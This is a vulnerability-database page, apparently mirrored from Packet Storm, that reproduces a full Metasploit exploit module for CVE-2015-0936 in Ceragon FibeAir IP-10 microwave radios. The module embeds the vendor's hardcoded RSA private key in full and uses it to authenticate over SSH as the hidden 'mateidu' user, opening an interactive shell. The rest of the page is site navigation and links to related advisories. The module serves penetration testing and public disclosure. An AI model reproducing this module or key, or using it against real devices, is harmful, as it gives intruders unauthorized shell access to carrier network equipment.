Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormH D MoorePACKETSTORM:131260
HistoryApr 02, 2015 - 12:00 a.m.

Ceragon FibeAir IP-10 SSH Private Key Exposure

2015-04-0200:00:00
H D Moore
packetstormsecurity.com
19

0.266 Low

EPSS

Percentile

96.8%

JSON
`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'net/ssh'  
  
class Metasploit3 < Msf::Exploit::Remote  
include Msf::Auxiliary::Report  
  
Rank = ExcellentRanking  
  
def initialize(info = {})  
super(update_info(info, {  
'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure',  
'Description' => %q{  
Ceragon ships a public/private key pair on FibeAir IP-10 devices  
that allows passwordless authentication to any other IP-10 device.  
Since the key is easily retrievable, an attacker can use it to  
gain unauthorized remote access as the "mateidu" user.  
},  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Privileged' => false,  
'Targets' => [ [ "Universal", {} ] ],  
'Payload' =>  
{  
'Compat' => {  
'PayloadType' => 'cmd_interact',  
'ConnectionType' => 'find',  
},  
},  
'Author' => [  
'hdm', # Discovery  
'todb' # Metasploit module and advisory text (mostly copy-paste)  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2015-0936'],  
['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure  
['URL', 'https://hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass  
],  
'DisclosureDate' => "Apr 01 2015", # Not a joke  
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },  
'DefaultTarget' => 0  
}))  
  
register_options(  
[  
# Since we don't include Tcp, we have to register this manually  
Opt::RHOST(),  
Opt::RPORT(22)  
], self.class  
)  
  
register_advanced_options(  
[  
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),  
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])  
]  
)  
  
end  
  
# helper methods that normally come from Tcp  
def rhost  
datastore['RHOST']  
end  
def rport  
datastore['RPORT']  
end  
  
def do_login(user)  
opt_hash = {  
:auth_methods => ['publickey'],  
:msframework => framework,  
:msfmodule => self,  
:port => rport,  
:key_data => [ key_data ],  
:disable_agent => true,  
:config => false,  
:record_auth_info => true,  
:proxies => datastore['Proxies']  
}  
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']  
begin  
ssh_socket = nil  
::Timeout.timeout(datastore['SSH_TIMEOUT']) do  
ssh_socket = Net::SSH.start(rhost, user, opt_hash)  
end  
rescue Rex::ConnectionError  
return nil  
rescue Net::SSH::Disconnect, ::EOFError  
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"  
return nil  
rescue ::Timeout::Error  
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"  
return nil  
rescue Net::SSH::AuthenticationFailed  
print_error "#{rhost}:#{rport} SSH - Failed authentication"  
return nil  
rescue Net::SSH::Exception => e  
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"  
return nil  
end  
  
if ssh_socket  
  
# Create a new session from the socket, then dump it.  
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)  
ssh_socket = nil  
  
return conn  
else  
return nil  
end  
end  
  
def exploit  
conn = do_login("mateidu")  
if conn  
print_good "#{rhost}:#{rport} - Successful login"  
handler(conn.lsock)  
end  
end  
  
def key_data  
<<EOF  
-----BEGIN RSA PRIVATE KEY-----  
MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr  
MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+  
IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB  
gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3  
CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv  
4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY  
SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6  
B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV  
93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc  
WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP  
YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll  
7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT  
uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg==  
-----END RSA PRIVATE KEY-----  
EOF  
end  
end  
  
`

Related

zdt 4
packetstorm 2
prion 1
cvelist 1
cve 1
nvd 1
openvas 1
zdt
zdt
Ceragon FibeAir IP-10 7.2.0 Hidden User Backdoor Vulnerability
2017-05-20 00:00:00
Ceragon FibeAir IP-10 SSH Private Key Exposure Vulnerability
2015-04-03 00:00:00
Ceragon FibeAir IP-10 SSH Private Key Exposure Exploit
2015-04-03 00:00:00
packetstorm
packetstorm
Ceragon FibeAir IP-10 7.2.0 Hidden User Backdoor
2017-05-19 00:00:00
Ceragon FibeAir IP-10 SSH Private Key Exposure
2015-04-02 00:00:00
prion
prion
Default credentials
2017-06-01 16:29:00
cvelist
cvelist
CVE-2015-0936
2017-06-01 16:00:00
cve
cve
CVE-2015-0936
2017-06-01 16:29:00
nvd
nvd
CVE-2015-0936
2017-06-01 16:29:00
openvas
openvas
Static SSH Key Used
2015-10-14 00:00:00

0.266 Low

EPSS

Percentile

96.8%

JSON
Related for PACKETSTORM:131260
zdt4packetstorm2prion1cvelist1cve1nvd1openvas1